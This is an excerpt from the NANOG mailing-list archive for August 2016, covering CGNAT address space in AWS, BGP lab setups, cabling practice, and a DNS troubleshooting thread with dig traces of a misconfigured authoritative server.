at 6:04 PM, William Herrin wrote: > On Thu, Aug 4, 2016 at 6:52 PM, Arlington Albertson > wrote: > > We've filed a support ticket to find out the supported level for this > > range, but I wanted to see if there was anyone out there who'd > experienced > > using the 100.64.0.0/10 space in AWS? > > Hi, > > The Carrier NAT space? The only difference between that and RFC1918 > space is that when you have an address conflict with a third party > using 100.64.0.0/10 it is 100% entirely your fault for > misappropriating it. > > Generally speaking, 100.64.0.0/10 should not be assigned to servers, > only client machines. Assigning it to servers creates a probability of > conflict that the space was meant to solve. > > Regards, > Bill Herrin > > > -- > William Herrin ................ herrin at dirtside.com bill at herrin.us > Owner, Dirtside Systems ......... Web: > -- Matthieu MICHAUD From mel at beckman.org Mon Aug 8 21:59:13 2016 From: mel at beckman.org (Mel Beckman) Date: Mon, 8 Aug 2016 21:59:13 +0000 Subject: Google compute engine private ASNs In-Reply-To: References: , Message-ID: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org> The best way to learn BGP is using a network simulator such as GNS3. This way you can use industry-standard configurations and experiment with various failover scenarios. Http://gns3.org. There are tons of tutorials out there using Cisco BGP router syntax. -mel beckman > On Aug 8, 2016, at 2:05 PM, Lee Fuller wrote: > > Hey, first post so sorry if it's misguided. I'm curious about the BGP > implementation in Google compute engine that allows you to define routing > policy using private ASN numbers. How similar is it in terms of learning > about BGP as a broader concept, or is it all smoke and mirrors? > > I'm not in a position where iBGP would benefit me in any other context than > learning so I'm keen not to bother if it's too abstracted from a real world > scenario. > > Lee Fuller (mobile) > > PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A From mnathani.lists at gmail.com Tue Aug 9 01:01:24 2016 From: mnathani.lists at gmail.com (Mansoor Nathani) Date: Mon, 8 Aug 2016 21:01:24 -0400 Subject: Google compute engine private ASNs In-Reply-To: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org> References: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org> Message-ID: If you manage to run a CSR1000v on something like Virtualbox, with like 8 GB of ram, you can actually work with a full IPv4 table. Check this video on how to set up CSR1000v with Virtualbox within GNS3: https://www.youtube.com/watch?v=hkRZRAU7n7E On Mon, Aug 8, 2016 at 5:59 PM, Mel Beckman wrote: > The best way to learn BGP is using a network simulator such as GNS3. This > way you can use industry-standard configurations and experiment with > various failover scenarios. Http://gns3.org. There are tons of tutorials > out there using Cisco BGP router syntax. > > > > -mel beckman > > > On Aug 8, 2016, at 2:05 PM, Lee Fuller wrote: > > > > Hey, first post so sorry if it's misguided. I'm curious about the BGP > > implementation in Google compute engine that allows you to define routing > > policy using private ASN numbers. How similar is it in terms of learning > > about BGP as a broader concept, or is it all smoke and mirrors? > > > > I'm not in a position where iBGP would benefit me in any other context > than > > learning so I'm keen not to bother if it's too abstracted from a real > world > > scenario. > > > > Lee Fuller (mobile) > > > > PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A > From mel at beckman.org Tue Aug 9 02:57:20 2016 From: mel at beckman.org (Mel Beckman) Date: Tue, 9 Aug 2016 02:57:20 +0000 Subject: Google compute engine private ASNs In-Reply-To: References: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org>, Message-ID: The stock 7206 that works with GNS3 also supports a full BGP feed. -mel beckman > On Aug 8, 2016, at 6:02 PM, Mansoor Nathani wrote: > > If you manage to run a CSR1000v on something like Virtualbox, with like 8 > GB of ram, you can actually work with a full IPv4 table. > > Check this video on how to set up CSR1000v with Virtualbox within GNS3: > > https://www.youtube.com/watch?v=hkRZRAU7n7E > > >> On Mon, Aug 8, 2016 at 5:59 PM, Mel Beckman wrote: >> >> The best way to learn BGP is using a network simulator such as GNS3. This >> way you can use industry-standard configurations and experiment with >> various failover scenarios. Http://gns3.org. There are tons of tutorials >> out there using Cisco BGP router syntax. >> >> >> >> -mel beckman >> >>> On Aug 8, 2016, at 2:05 PM, Lee Fuller wrote: >>> >>> Hey, first post so sorry if it's misguided. I'm curious about the BGP >>> implementation in Google compute engine that allows you to define routing >>> policy using private ASN numbers. How similar is it in terms of learning >>> about BGP as a broader concept, or is it all smoke and mirrors? >>> >>> I'm not in a position where iBGP would benefit me in any other context >> than >>> learning so I'm keen not to bother if it's too abstracted from a real >> world >>> scenario. >>> >>> Lee Fuller (mobile) >>> >>> PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A >> From randy at psg.com Tue Aug 9 09:41:25 2016 From: randy at psg.com (Randy Bush) Date: Tue, 09 Aug 2016 18:41:25 +0900 Subject: calling a routing deep diver in as12369 Message-ID: hi. i would really appreciate a conversation with a routing geek in 12369. research measurements have raised some questions, and we would love an inside clue. thanks. randy From randy at psg.com Tue Aug 9 11:25:36 2016 From: randy at psg.com (Randy Bush) Date: Tue, 09 Aug 2016 20:25:36 +0900 Subject: calling a routing deep diver in as12389 In-Reply-To: References: Message-ID: > hi. i would really appreciate a conversation with a routing geek in > 12369. research measurements have raised some questions, and we would > love an inside clue. thanks. make that 12389, Rostelecom randy From dgolding at gmail.com Tue Aug 9 14:19:40 2016 From: dgolding at gmail.com (Daniel Golding) Date: Tue, 09 Aug 2016 14:19:40 +0000 Subject: [NANOG-announce] 2016 NANOG General Elections and Committee Selection Message-ID: NANOG Members and Participants, We are once again approaching the annual NANOG election and appointment time. Board candidate nominations open August 15th and the complete Election timeline can be found here . We encourage those in the community who are not currently NANOG members to consider becoming members of NANOG and to participate in the election process. Through membership and voting, you will be an active participant in directing all NANOG activities. Only NANOG members are eligible to vote and serve in the NANOG Board of Directors and Committees. Click here to become a member today! **If you are not a member and wish to vote in this election, your membership must be received by 12:00 p.m. Central Time on Friday October 14, 2016.** Why? If you care about NANOG and think that you would like to take a turn at volunteering your time to help make it better, please consider joining as a member and taking part in the election and nomination process. If you know someone else that you believe would be interested in serving on the Board of Directors, nominate them by completing the Online Process beginning August 15, 2016. Any questions should be submitted to elections at nanog.org. As NANOG continues to evolve, our Board of Directors and Committees will continue to play an increasingly important role in our success. By joining now, you can be an integral part of the process. For more information about the role of a Board of Director or any Committee Member, or to find out more about what's involved in serving, please consult the current NANOG Bylaws or follow the links to the Board and Committee pages from the General 2016 NANOG Elections Page . Best regards, Daniel Golding *Chair, NANOG Board of Directors* -------------- next part -------------- _______________________________________________ NANOG-announce mailing list NANOG-announce at mailman.nanog.org http://mailman.nanog.org/mailman/listinfo/nanog-announce From hannigan at gmail.com Tue Aug 9 16:20:00 2016 From: hannigan at gmail.com (Martin Hannigan) Date: Tue, 9 Aug 2016 12:20:00 -0400 Subject: Best practices for tracking intra-facility crossconnects In-Reply-To: References: Message-ID: On Mon, Aug 8, 2016 at 1:14 PM, Eric Kuhnke wrote: > Hey all, > > I am looking to see what the community's experience has been with different > types of labeling systems and XC tracking systems for intra-facility > crossconnects. > I haven't used these in a long time, but here are a few example cable run lists that can be modified to your hearts content: http://bit.ly/CRL2016 I found the format useful to create implementation detail and generate labels. It was easy to pay the data forward and reverse afterwards. Exported data should be loaded into a management system. It could also work in reverse, but being able to have dynamic documentation to end with as-builts is generally a win. > In addition to the standard practice of labeling every fiber at both ends, > if you're using a system that wraps a cable marker around the cable every 3 > ft/1 meter, what type of system are you using to track XCs? > Greybar or Anixter-like supply houses can sell you/your vendor striped fiber optic bundles. It's an additional expense, but it's not entirely ugly. The last deployment I worked on with respect to a fiber interconnect system IIRC we asked the electricians to wrap a loop every N' using different colored electrical tape for the A and B runs. That worked too. > If you have implemented a standards-based system with some type of GUID for > every cable, and a unique per-cable tracking system that is utilized with a > ticketing system for each distinct cable (whether -48VDC, fiber, cat5e, > alarm wire, whatever), what did you have to customize for your needs? > I don't have any advice other than don't over think it. If a text file or excel spreadsheet works; embrace it. Best, -M< From arlingtonalbertson at gmail.com Tue Aug 9 21:25:33 2016 From: arlingtonalbertson at gmail.com (Arlington Albertson) Date: Tue, 09 Aug 2016 21:25:33 +0000 Subject: RFC6598 in AWS? In-Reply-To: References: Message-ID: Thanks All, That was my understanding and research as well. Further, I have heard back directly from AWS and they have stated that while "yes" technically you can use it, you are prone to dns routing issues at the very least and should not expect everything to "just work" as it would with RFC1918. Appreciate the feedback. Case closed. On Sun, Aug 7, 2016 at 2:37 AM Matthieu Michaud wrote: > Hi, > > I fully agree with William and it's used in AWS infrastructure (VPC > Internet GW IIRW). > > Best regards, > > On Fri, Aug 5, 2016 at 6:04 PM, William Herrin wrote: > >> On Thu, Aug 4, 2016 at 6:52 PM, Arlington Albertson >> wrote: >> > We've filed a support ticket to find out the supported level for this >> > range, but I wanted to see if there was anyone out there who'd >> experienced >> > using the 100.64.0.0/10 space in AWS? >> >> Hi, >> >> The Carrier NAT space? The only difference between that and RFC1918 >> space is that when you have an address conflict with a third party >> using 100.64.0.0/10 it is 100% entirely your fault for >> misappropriating it. >> >> Generally speaking, 100.64.0.0/10 should not be assigned to servers, >> only client machines. Assigning it to servers creates a probability of >> conflict that the space was meant to solve. >> >> Regards, >> Bill Herrin >> >> >> -- >> William Herrin ................ herrin at dirtside.com bill at herrin.us >> Owner, Dirtside Systems ......... Web: >> > > > > -- > Matthieu MICHAUD > From lowen at pari.edu Wed Aug 10 12:49:53 2016 From: lowen at pari.edu (Lamar Owen) Date: Wed, 10 Aug 2016 08:49:53 -0400 Subject: Best practices for telcoflex -48VDC cabling & other power OSI layer 1 In-Reply-To: References: Message-ID: On 07/18/2016 12:12 PM, Eric Kuhnke wrote: > I'm looking for a document or set of photos/presentation on best practices > for telcoflex/-48VDC power cabling installation. Labeling, routing, > organization and termination, etc. Or a recommendation on a printed book > that covers this topic. I apologize for the late reply, but even if just for the archives, the best resource for DC power systems and cabling I have ever found is "DC Power System Design for Telecommunications" by Whitham D. Reeve, published by Wiley and Sons as part of the IEEE Telecommunications Handbook Series. From jmaimon at ttec.com Wed Aug 10 18:05:26 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 10 Aug 2016 14:05:26 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect Message-ID: <57AB6CE6.7040403@ttec.com> www.kissimmee.org Windows 2008 dns cannot resolve it. BIND can. Windows appears to believe the rfc2308 type 2 response, even though recursing the CNAME results in a different authority, ns, and A response, which I assuming is why BIND returns the answer. I must be missing a switch somewhere. Any pointers would be appreciated. From bill at herrin.us Wed Aug 10 18:52:56 2016 From: bill at herrin.us (William Herrin) Date: Wed, 10 Aug 2016 14:52:56 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <57AB6CE6.7040403@ttec.com> References: <57AB6CE6.7040403@ttec.com> Message-ID: On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: > www.kissimmee.org > > Windows 2008 dns cannot resolve it. > > BIND can. Hi Joe, Does Windows 2008 like anything in the "hosting" TLD? I notice that the nameresolve.com servers returning the CNAME to kissimmee-fl.vts.hosting are also returning an SOA record for "hosting" in the authority section which looks very strange to me. Perhaps Windows is rejecting it as an invalid, possibly dangerous response packet? Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From bill at herrin.us Wed Aug 10 18:55:01 2016 From: bill at herrin.us (William Herrin) Date: Wed, 10 Aug 2016 14:55:01 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> Message-ID: On Wed, Aug 10, 2016 at 2:52 PM, William Herrin wrote: > On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: >> www.kissimmee.org >> >> Windows 2008 dns cannot resolve it. >> >> BIND can. > > Hi Joe, > > Does Windows 2008 like anything in the "hosting" TLD? > > I notice that the nameresolve.com servers returning the CNAME to > kissimmee-fl.vts.hosting are also returning an SOA record for > "hosting" in the authority section which looks very strange to me. > Perhaps Windows is rejecting it as an invalid, possibly dangerous > response packet? BTW, here's what I'm talking about: dig a www.kissimmee.org +trace +all ; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> a www.kissimmee.org +trace +all ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2759 ;; flags: qr aa ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 13 ;; QUESTION SECTION: ;. IN NS ;; ANSWER SECTION: . 518400 IN NS a.root-servers.net. . 518400 IN NS m.root-servers.net. . 518400 IN NS i.root-servers.net. . 518400 IN NS b.root-servers.net. . 518400 IN NS h.root-servers.net. . 518400 IN NS e.root-servers.net. . 518400 IN NS j.root-servers.net. . 518400 IN NS g.root-servers.net. . 518400 IN NS l.root-servers.net. . 518400 IN NS k.root-servers.net. . 518400 IN NS f.root-servers.net. . 518400 IN NS c.root-servers.net. . 518400 IN NS d.root-servers.net. ;; ADDITIONAL SECTION: a.root-servers.net. 3600000 IN A 198.41.0.4 a.root-servers.net. 3600000 IN AAAA 2001:503:ba3e::2:30 b.root-servers.net. 3600000 IN A 192.228.79.201 b.root-servers.net. 3600000 IN AAAA 2001:500:84::b c.root-servers.net. 3600000 IN A 192.33.4.12 c.root-servers.net. 3600000 IN AAAA 2001:500:2::c d.root-servers.net. 3600000 IN A 199.7.91.13 d.root-servers.net. 3600000 IN AAAA 2001:500:2d::d e.root-servers.net. 3600000 IN A 192.203.230.10 f.root-servers.net. 3600000 IN A 192.5.5.241 f.root-servers.net. 3600000 IN AAAA 2001:500:2f::f g.root-servers.net. 3600000 IN A 192.112.36.4 h.root-servers.net. 3600000 IN A 198.97.190.53 ;; Query time: 12 msec ;; SERVER: 192.168.99.1#53(192.168.99.1) ;; WHEN: Wed Aug 10 14:54:00 2016 ;; MSG SIZE rcvd: 496 ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53554 ;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 6, ADDITIONAL: 12 ;; QUESTION SECTION: ;www.kissimmee.org. IN A ;; AUTHORITY SECTION: org. 172800 IN NS a0.org.afilias-nst.info. org. 172800 IN NS a2.org.afilias-nst.info. org. 172800 IN NS b0.org.afilias-nst.org. org. 172800 IN NS b2.org.afilias-nst.org. org. 172800 IN NS c0.org.afilias-nst.info. org. 172800 IN NS d0.org.afilias-nst.org. ;; ADDITIONAL SECTION: a0.org.afilias-nst.info. 172800 IN A 199.19.56.1 a2.org.afilias-nst.info. 172800 IN A 199.249.112.1 b0.org.afilias-nst.org. 172800 IN A 199.19.54.1 b2.org.afilias-nst.org. 172800 IN A 199.249.120.1 c0.org.afilias-nst.info. 172800 IN A 199.19.53.1 d0.org.afilias-nst.org. 172800 IN A 199.19.57.1 a0.org.afilias-nst.info. 172800 IN AAAA 2001:500:e::1 a2.org.afilias-nst.info. 172800 IN AAAA 2001:500:40::1 b0.org.afilias-nst.org. 172800 IN AAAA 2001:500:c::1 b2.org.afilias-nst.org. 172800 IN AAAA 2001:500:48::1 c0.org.afilias-nst.info. 172800 IN AAAA 2001:500:b::1 d0.org.afilias-nst.org. 172800 IN AAAA 2001:500:f::1 ;; Query time: 217 msec ;; SERVER: 192.58.128.30#53(192.58.128.30) ;; WHEN: Wed Aug 10 14:54:02 2016 ;; MSG SIZE rcvd: 437 ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27382 ;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0 ;; QUESTION SECTION: ;www.kissimmee.org. IN A ;; AUTHORITY SECTION: kissimmee.org. 86400 IN NS ns4.nameresolve.com. kissimmee.org. 86400 IN NS ns3.nameresolve.com. kissimmee.org. 86400 IN NS ns1.nameresolve.com. kissimmee.org. 86400 IN NS ns2.nameresolve.com. ;; Query time: 105 msec ;; SERVER: 199.19.53.1#53(199.19.53.1) ;; WHEN: Wed Aug 10 14:54:03 2016 ;; MSG SIZE rcvd: 122 ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14318 ;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;www.kissimmee.org. IN A ;; ANSWER SECTION: www.kissimmee.org. 3600 IN CNAME kissimmee-fl.vts.hosting. ;; AUTHORITY SECTION: hosting. 3600 IN SOA ns2.nshosts.com. info.webstrikesolutions.com.hosting. 1089178331 900 3600 604800 3600 ;; Query time: 19 msec ;; SERVER: 66.96.142.146#53(66.96.142.146) ;; WHEN: Wed Aug 10 14:54:03 2016 ;; MSG SIZE rcvd: 152 From jmaimon at ttec.com Wed Aug 10 19:27:32 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 10 Aug 2016 15:27:32 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> Message-ID: <57AB8024.7010702@ttec.com> William Herrin wrote: > On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: >> www.kissimmee.org >> >> Windows 2008 dns cannot resolve it. >> >> BIND can. > > Hi Joe, > > Does Windows 2008 like anything in the "hosting" TLD? > > I notice that the nameresolve.com servers returning the CNAME to > kissimmee-fl.vts.hosting are also returning an SOA record for > "hosting" in the authority section which looks very strange to me. > Perhaps Windows is rejecting it as an invalid, possibly dangerous > response packet? > > Regards, > Bill Herrin > > I think that provided SOA record is a "local" or "alternate" version and its existence is why the nxdomain response is being sent to the windows dns server that accepts it at face value (but does not appear to store it in cache, so this is not precisely cache poisoning) Here is another example, unrelated to the new TLD's www.lomita.com Joe From bill at herrin.us Wed Aug 10 22:50:11 2016 From: bill at herrin.us (William Herrin) Date: Wed, 10 Aug 2016 18:50:11 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <57AB8024.7010702@ttec.com> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> Message-ID: On Wed, Aug 10, 2016 at 3:27 PM, Joe Maimon wrote: > William Herrin wrote: >> On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: >>> www.kissimmee.org >>> Windows 2008 dns cannot resolve it. >> I notice that the nameresolve.com servers returning the CNAME to >> kissimmee-fl.vts.hosting are also returning an SOA record for >> "hosting" in the authority section which looks very strange to me. >> Perhaps Windows is rejecting it as an invalid, possibly dangerous >> response packet? > > I think that provided SOA record is a "local" or "alternate" version and its > existence is why the nxdomain response is being sent to the windows dns > server that accepts it at face value (but does not appear to store it in > cache, so this is not precisely cache poisoning) Oh! I missed that. ns*.nameresolve.com, the authoratative name servers for kissimmee.org, are saying NXDOMAIN for www.kissimmee.org. Any idea what DNS server nameresolve.com uses? Because that's... wow. -Bill -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From marka at isc.org Wed Aug 10 22:58:52 2016 From: marka at isc.org (Mark Andrews) Date: Thu, 11 Aug 2016 08:58:52 +1000 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: Your message of "Wed, 10 Aug 2016 15:27:32 -0400." <57AB8024.7010702@ttec.com> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> Message-ID: <20160810225852.531FD5061639@rock.dv.isc.org> In message <57AB8024.7010702 at ttec.com>, Joe Maimon writes: > > > William Herrin wrote: > > On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: > >> www.kissimmee.org > >> > >> Windows 2008 dns cannot resolve it. > >> > >> BIND can. > > > > Hi Joe, > > > > Does Windows 2008 like anything in the "hosting" TLD? > > > > I notice that the nameresolve.com servers returning the CNAME to > > kissimmee-fl.vts.hosting are also returning an SOA record for > > "hosting" in the authority section which looks very strange to me. > > Perhaps Windows is rejecting it as an invalid, possibly dangerous > > response packet? > > > > Regards, > > Bill Herrin > > > > > > I think that provided SOA record is a "local" or "alternate" version and > its existence is why the nxdomain response is being sent to the windows > dns server that accepts it at face value (but does not appear to store > it in cache, so this is not precisely cache poisoning) Nameresovle.com's servers are returning answers that can be seen as a cache poisioning attempt. They are NOT authorative for ".hosting" but have been configured as if they are. This is a big NO NO. You don't configure youself as authoritative for a zone that has not been delegated to you and in particular you don't configure yourself as authoritative for "." or a TLD. Windows 2008 is quite correct in rejecting this answer. Named would as well except for the number of DNS hosters that do this sort of garbage. Named just sees the CNAME and stops processing the message after that. Mark > Here is another example, unrelated to the new TLD's > > www.lomita.com > > > Joe -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From jmaimon at ttec.com Wed Aug 10 23:10:14 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 10 Aug 2016 19:10:14 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <20160810225852.531FD5061639@rock.dv.isc.org> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> <20160810225852.531FD5061639@rock.dv.isc.org> Message-ID: <57ABB456.5020003@ttec.com> Mark Andrews wrote: > > Nameresovle.com's servers are returning answers that can be seen > as a cache poisioning attempt. They are NOT authorative for > ".hosting" but have been configured as if they are. This is a big > NO NO. You don't configure youself as authoritative for a zone > that has not been delegated to you and in particular you don't > configure yourself as authoritative for "." or a TLD. > > Windows 2008 is quite correct in rejecting this answer. Named would > as well except for the number of DNS hosters that do this sort of > garbage. Named just sees the CNAME and stops processing the message > after that. > > Mark > Thanks for the replies Mark and Bill. I think its fair to say that most DNS servers have at one time or another hosted a zone they were not authoritative for according to the DNS tree, as simple as a customer leaving without notice, cruft, split view incorrectly configured, etc. In any event, windows is accepting the negative answer, BIND is rejecting it and going forward with resolving the CNAME, sucessfully. Joe From marka at isc.org Wed Aug 10 23:24:50 2016 From: marka at isc.org (Mark Andrews) Date: Thu, 11 Aug 2016 09:24:50 +1000 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: Your message of "Wed, 10 Aug 2016 19:10:14 -0400." <57ABB456.5020003@ttec.com> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> <20160810225852.531FD5061639@rock.dv.isc.org> <57ABB456.5020003@ttec.com> Message-ID: <20160810232450.3290450619EA@rock.dv.isc.org> In message <57ABB456.5020003 at ttec.com>, Joe Maimon writes: > > > Mark Andrews wrote: > > > > > Nameresovle.com's servers are returning answers that can be seen > > as a cache poisioning attempt. They are NOT authorative for > > ".hosting" but have been configured as if they are. This is a big > > NO NO. You don't configure youself as authoritative for a zone > > that has not been delegated to you and in particular you don't > > configure yourself as authoritative for "." or a TLD. > > > > Windows 2008 is quite correct in rejecting this answer. Named would > > as well except for the number of DNS hosters that do this sort of > > garbage. Named just sees the CNAME and stops processing the message > > after that. > > > > Mark > > > > Thanks for the replies Mark and Bill. > > I think its fair to say that most DNS servers have at one time or > another hosted a zone they were not authoritative for according to the > DNS tree, as simple as a customer leaving without notice, cruft, split > view incorrectly configured, etc. Having the odd leaf zone left over doesn't usually cause operational problems. You have to be very unlucky to be delegated a zone that has a CNAME that points into the left over leaf zone. In this case there is a fake TLD zone. This isn't a left over zone. This is a DNS hoster not understanding the DNS and the implications of their operational decisions. People forget nameservers return negative existance answers and that they need to be as valid as the positive existance answers. > In any event, windows is accepting the negative answer, BIND is > rejecting it and going forward with resolving the CNAME, sucessfully. > > Joe -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From andy at newslink.com Thu Aug 11 03:29:15 2016 From: andy at newslink.com (Andy Ringsmuth) Date: Wed, 10 Aug 2016 22:29:15 -0500 Subject: Hosting recommendations Message-ID: <34B920F4-E326-4BD6-B7B1-652C827903BB@newslink.com> Fellow NANOGers, I realize the list rules prohibit people advertising/pushing their own products or companies, so I hope this doesn?t break that rule by asking. I?d like some recommendations for a solid hosting provider. Nothing hugely extensive. About 50 IMAP email users, basic web hosting for a few domains, some mailman lists and that?s about it. I?ve had us with our current host for several years but their e-mail infrastructure has been increasingly unreliable the last couple years. I don?t really want to go through the headache of switching providers but if it means less problems down the road, I?ll definitely do it. I have self-hosted in the past but it was a big enough challenge that I won?t go that route again. So, what do y?all recommend for a solid provider? Thank you in advance! ---- Andy Ringsmuth andy at newslink.com News Link ? Manager Travel, Technology & Facilities 2201 Winthrop Rd., Lincoln, NE 68502-4158 (402) 475-6397 (402) 304-0083 cellular From dot at dotat.at Thu Aug 11 10:42:40 2016 From: dot at dotat.at (Tony Finch) Date: Thu, 11 Aug 2016 11:42:40 +0100 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <57AB6CE6.7040403@ttec.com> References: <57AB6CE6.7040403@ttec.com> Message-ID: Joe Maimon wrote: > www.kissimmee.org > > Windows appears to believe the rfc2308 type 2 response, RFC 2308 isn't relevant to this domain. The responses aren't NXDOMAIN, so section 2.1 doesn't apply, and the response includes answers, so section 2.2 doens't apply. Tony. -- f.anthony.n.finch http://dotat.at/ - I xn--zr8h punycode Fisher, German Bight: South, veering west or southwest, 4 or 5, increasing 6 at times. Slight or moderate. Occasional rain. Good, occasionally poor. From dot at dotat.at Thu Aug 11 10:45:46 2016 From: dot at dotat.at (Tony Finch) Date: Thu, 11 Aug 2016 11:45:46 +0100 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> Message-ID: William Herrin wrote: > > Oh! I missed that. ns*.nameresolve.com, the authoratative name servers > for kissimmee.org, are saying NXDOMAIN for www.kissimmee.org. Any idea > what DNS server nameresolve.com uses? Because that's... wow. Er, me too, headdesk. NXDOMAIN with an answer?! $ fpdns ns2.yourhostingaccount.com. fingerprint (ns2.yourhostingaccount.com., 65.254.254.155): Unlogic Eagle DNS 1.0 -- 1.0.1 [New Rules] Tony. -- f.anthony.n.finch http://dotat.at/ - I xn--zr8h punycode Humber, Thames, Dover: West or southwest 4 or 5, increasing 6 at times. Slight or moderate. Occasional rain at first. Good, occasionally poor at first. From jmaimon at ttec.com Thu Aug 11 12:39:24 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Thu, 11 Aug 2016 08:39:24 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> Message-ID: <57AC71FC.7080507@ttec.com> Tony Finch wrote: > Joe Maimon wrote: > >> www.kissimmee.org >> >> Windows appears to believe the rfc2308 type 2 response, > > RFC 2308 isn't relevant to this domain. The responses aren't NXDOMAIN, so > section 2.1 doesn't apply, and the response includes answers, so section > 2.2 doens't apply. > > Tony. > We must be reading different things. NXDOMAIN RESPONSE: TYPE 2. Header: RDCODE=NXDOMAIN Query: AN.EXAMPLE. A Andrews Standards Track [Page 3] RFC 2308 DNS NCACHE March 1998 Answer: AN.EXAMPLE. CNAME TRIPPLE.XX. Authority: XX. SOA NS1.XX. HOSTMASTER.NS1.XX. .... Additional: c:\Documents and Settings\joe.JOE.000>c:\programs\bind\bin\dig.exe www.kissimmee .org @ns1.nameresolve.com ; <<>> DiG 9.10a2 <<>> www.kissimmee.org @ns1.nameresolve.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36437 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 ;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1680 ;; QUESTION SECTION: ;www.kissimmee.org. IN A ;; ANSWER SECTION: www.kissimmee.org. 3600 IN CNAME kissimmee-fl.vts.hosting. ;; AUTHORITY SECTION: hosting. 3600 IN SOA ns2.nshosts.com. info.webstrikes olutions.com.hosting. 1089178331 900 3600 604800 3600 ;; Query time: 62 msec ;; SERVER: 66.96.142.146#53(66.96.142.146) ;; WHEN: Thu Aug 11 08:36:59 Eastern Daylight Time 2016 ;; MSG SIZE rcvd: 163 From ryan at finnesey.com Fri Aug 12 05:56:51 2016 From: ryan at finnesey.com (Ryan Finnesey) Date: Fri, 12 Aug 2016 05:56:51 +0000 Subject: DNS Services for a registrar Message-ID: We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. Cheers Ryan From jared at puck.nether.net Fri Aug 12 12:28:10 2016 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 12 Aug 2016 08:28:10 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: > On Aug 12, 2016, at 1:56 AM, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? My big concern would be the current lack of v6 support on AWS for such a deployment. I suspect it?s coming soon as they just announced IPv6 support on S3 yesterday. How many zones do you expect to scale to? I?ve been running a free secondary DNS service for many years on BIND, but moving to something else makes a lot of sense these days. Do you have a lot of DNS server experience in-house? There?s a lot of little things that come up along the way. You really should consider being subscribed to the dns-operations list and asking there as well. > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. I like having good control over my own fate, so would prefer running my own service, but plenty of people use hosted DNS at their providers, and there?s plenty of folks who can sell you a service from dyn to neustar with their own cost models. I would either provide a completely opaque service offering where you retain control of the NS records so can easily move/renumber as you scale up, or consider a solution which can be expanded globally as needed over time. I?m able to host ~10k zones in my free secondary service without issues, but to ?take the next step? requires decoupling 20 years of history I?m dragging around. - Jared From marka at isc.org Fri Aug 12 13:14:41 2016 From: marka at isc.org (Mark Andrews) Date: Fri, 12 Aug 2016 23:14:41 +1000 Subject: DNS Services for a registrar In-Reply-To: Your message of "Fri, 12 Aug 2016 08:28:10 -0400." References: Message-ID: 